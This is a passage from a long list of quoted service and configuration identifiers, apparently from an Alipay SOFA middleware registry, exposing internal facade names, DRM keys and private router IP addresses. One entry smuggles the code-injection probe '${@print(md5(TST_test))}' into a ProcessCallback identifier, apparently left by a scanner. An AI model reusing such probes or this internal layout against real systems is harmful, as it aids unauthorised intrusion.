SOFA","com.alipay.peerpay.prod.common.service.inner.facade.account.JointAccountInnerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.easytest.agent.facade.SchedulerTriggerFacade:1.0:ifxposition_scedulerTriggerFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkoyzcore_fallbackPreviousEnvProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mirrorprod.facade.gateway.service.CheckerReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ngfeguard.facade.denoise.DenoiseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue34#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchservbase.biz.service.leads.facade.LeadsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.transaction.SpecialTransListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.auditprod.common.service.facade.fund.api.BizQueryFacade:1.0:auditprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundFreezeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.166.39#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.idpatrol.core.service.inspect.admin.IdConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:finstore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.instance.api.InstancetransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.common.service.facade.fund.FundRuleDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpcscgateway.common.service.facade.SecurityAdviceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reservecenter.facade.api.InstUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AmSpuPriceLevelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:pcreditauthasset@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:bucclient-only@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.cif.UserInfoQueryServiceClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprotocol.common.service.facade.FundContractQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@kbadvert#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.pfunddts.common.facade.api.AppOwnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.catalog.CatalogMngQueryNgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYINTLJSESSIONID.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.iexpbizprod:name=com.alipay.zcache.log.iexpbizprod.logLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentlib.common.service.facade.common.PushTaskInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.facade.api.ServiceFollowupService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiancore.common.service.InsPolicyBalanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.prepaidcard.PpcArgService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.platform.schedule.concurrent.load.DataLoadDriver:1.0:minitranscloudDataLoadDriver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.AssetPoolQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tcc.common.service.facade.api.AddTagRequestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finconsumeprod.facade.mng.ComTransGoodsMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_SUSU#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.logrotator-app-hour-custom_hourdelimiter:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccountRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_editIsvInfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.arrangement.LoanARQueryFacade:1.0:loanARQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.common.service.integration.drm.ArrangementBlackListMigrateDrm.migrateReadArrangementBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.device.OpenDeviceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_CLIVECENTERLOW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.fcbuservice.common.service.facade.AuditFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.158.80#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.checkroute.common.service.checkersdk.service.CheckerService:1.0:bkcheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.logo.IndustryShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbrulecenter.common.service.backendfacade.api.RuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkUriWithFormated,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lowercaseFirst:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minicenter.common.service.facade.api.feedback.MiniAppFeedbackCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:gzmsdtb-staffmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinstockprod.biz.service.gw.asset.api.AssetProfileService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.volvo.common.service.facade.api.demo.TrDemoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finlinkopen@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsearch.common.service.facade.api.evaluate.BuffettEvaluationDiffManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rdeclarecenter.biz.report.rdc.manager.RdcReportTemplateManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insserviceprod.facade.InsSerPerformanceMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinspect.facade.check.CaseExecHisService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.oceanbase.obforumcore.service.open.live.LiveCommunityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.193.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.88.184.162#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zcbsalescenter.common.service.integration.fintradecenter.FintradeOrderQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-skylarkmobiletwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:zarcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.financial.FinancialAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.121.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcreditprod.multiAccountsService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.common.OneTimeTaskServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.188.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fininfo:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableHeadCarry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mbill.common.service.facade.MbillTemplateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.merchant.MerchantRtDiscountConsultiveService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.164.150.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_G_SUPERGW_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.177.133#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pccontractprod.common.service.facade.admin.api.DataItemElementAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.common.service.facade.SupportJsonBizService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.secucommunity.speech.api.backtrace.BacktraceSpeechFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.service.PcreditLifeFeeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csconfig.service.mng.facade.api.ClientExceptionService:1.0:merchantService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insendorseprod.common.service.InsEndorsementSurrenderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.category.CategoryLoalManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dss.endpoint.plugin.openapi.DsCfgOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cashiercore.service.facade.api.CashiercoreChannelSwitchService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInRouteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:ALI_MERCHANTCARD@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.drm.UctransBlacklistDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileic.common.service.facade.VerifyCallbackFacade:1.0:mobilewealth_mobilewealth_cardmng_mobilewealth_cardmng_ic_mobileClient@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscenter.service.contact.facade.PhoneContactInfoService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianprod.common.facade.MktRenderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.chargeGzoneTBaseCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dchainbankloan.facade.api.notify.AssetNotifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:securityprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.cif.client.drm.ClientLogControlDrmSwitch.fraudmng.logControlDrmSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mdeviceprod.common.service.facade.query.DevicePageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.160.159.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.45.65.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.icdpcore.deliveryprod.common.service.facade.api.scene.DecisionSceneMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_BIZINSIGHT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthcore.common.service.facade.api.endorse.GiftEndorseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.bizservice.facade.SiteAccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:overseatwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dmirror:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.service.facade.marketpoint.api.MptransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.255.210#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.appstore.common.service.facade.commodity.BumngCommodityScenceManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsTempManager.abTestWhiteListEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.membertangram.common.service.facade.balance.VisitorIndexFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_USERPURVIEW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acordercore.common.service.facade.rest.AcOrderTaskSofaService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finadvisorprod.common.service.facade.mng.GmvTargetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcactivitycore.square.send@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfundtrade:name=com.alipay.finfundtrade.common.service.facade.drm.FinfundtradeGzoneDrmConfig.gzoneRandomPercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.miniprod.common.service.facade.api.miniappdicovery.RecommendServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbarcenter.common.service.facade.ar.ArStatusFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.open.facade.OpenReplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.air.service.facade.BatchRecService:1.0:recneptuneBatchRecService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.129.189#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundprod.common.service.facade.scene.StaticRefreshDataQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socplt.common.service.facade.NameListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.blood.ZbdmBloodStatisticsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.antha.ha.AnthaSentiAlarmManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.128.189#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalReliableDrm.serverGrayStore,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:jiuzhou@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_OPEN_SERVICE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.supergwlite.service.facade.api.MessageSendService:1.0:ifcsupergw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.category.DocQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:archimedes@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.60.244#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.argo.service.facade.SequenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:lifeexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.165.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:findtprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:sdaappdist@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.onestopmng.MerchantIndustryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisoropen.common.service.facade.api.AdvisorChargeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:porder@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.security.cds.facade.ChangeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.HumanToHumanDrmResource.minRangeCent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.memberprod.common.service.anttoken.AntAccessTokenService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelink.client.SpannerZoneRouterClient:1.0:pushcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.TaskAttachmentService:1.0:sofa4@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.protocol-https:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ecdcc:name=com.alipay.titan.dcc.biz.credit.drm.CreditConfigResource.creditTaskGroupsState,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superlink.service.facade.api.batch.BatchAsynScanService:1.0:superlink@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityprodmng.common.service.facade.DepartmentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditbenefit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.SignService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:criskcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.52.197#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.customscenter:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_S_MOBILEBC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:exclienttrdcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.inner.ProductRequirementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.antstack.AntstackOpFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","tiyubiz@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.client.SystemAppInvokeService:1.0:bkloansceneprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.growthplus.indicator.GrowthIndicatorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uemprod.common.service.facade.whitelist.EntWhiteListServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antdatashow.facade.api.RuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.manageapi.RegionRouterManager:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.query.YebsTransferOutOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.fraudmng.ctubizDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.consumecenter.common.service.integration.revol.RuleProcessorClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditint.facade.service.PcreditBearingintDecideFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.177.132#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitycore:name=com.alipay.securitycore.common.service.facade.ldc.SecurityLdcSwitchResource.switchZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iliquidity.biz.shared.scheduler.executor.AlmExecutor:1.0:almTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirefront.service.facade.api.AcquireOrderPayableCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.cif.client.drm.CifTouchCacheSwitcher.touchRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.portal.common.service.facade.qualityassess.TagBizRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.55.118#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.accounting.service.facade.AccoreQueryV2Facade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recadmin.common.service.facade.ModuleInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.service.impl.schedule.GroupBuyingTaskDRM.taskDemotionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.igopcore.common.service.facade.api.sandbox.SandboxMockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.mprotal.PayXAbilityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.meta2:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.exratecenter.service.facade.api.ExClientRateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.monitorevent.common.facade.OpsEventQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.invoicecommercial.facade.api.AcceptInvoiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.migration.EntOperatorExtQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.CommodityOrderAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frservcenter.facade.api.TreeNodeRelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.FixedInvestmentContractInspectDRM.whiteListByUserIdStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.guardianconsole.facade.configs.service.GuardianAdaptiveLimitFacade:1.0:guardianconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-dtbank-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.clearingcenter:name=com.alipay.supergwlite.components.umessage.UniMsgConfigResource.openXStreamWhiteListFunction,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sdaota.common.service.client.service.OtaDownService:1.0:sdaxconnectplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.xview.core.common.facade.CallbackService:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.29.129#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dcepprod.common.service.facade.api.BindExchangeCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.HumanToHumanDrmResource.appVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:dwalm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mobilesecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.operation.CommodityOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.biz.platform.task.complainmessage.impl.FraudFeedBackWordingSwitchImpl.sendSelfRelieveFeedback,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.fc.depcore.service.facade.query.DepositQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.lifecore.common.service.facade.statistics.OfficialAccountStatOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:${@print(md5(TST_test))}\\\\\\\\@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.web.mvc.security.web.form.FormManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.176.189#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.rating:name=com.alipay.rating.service.facade.localclient.drm.RatingLocalclientDrmImpl.printDetail,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM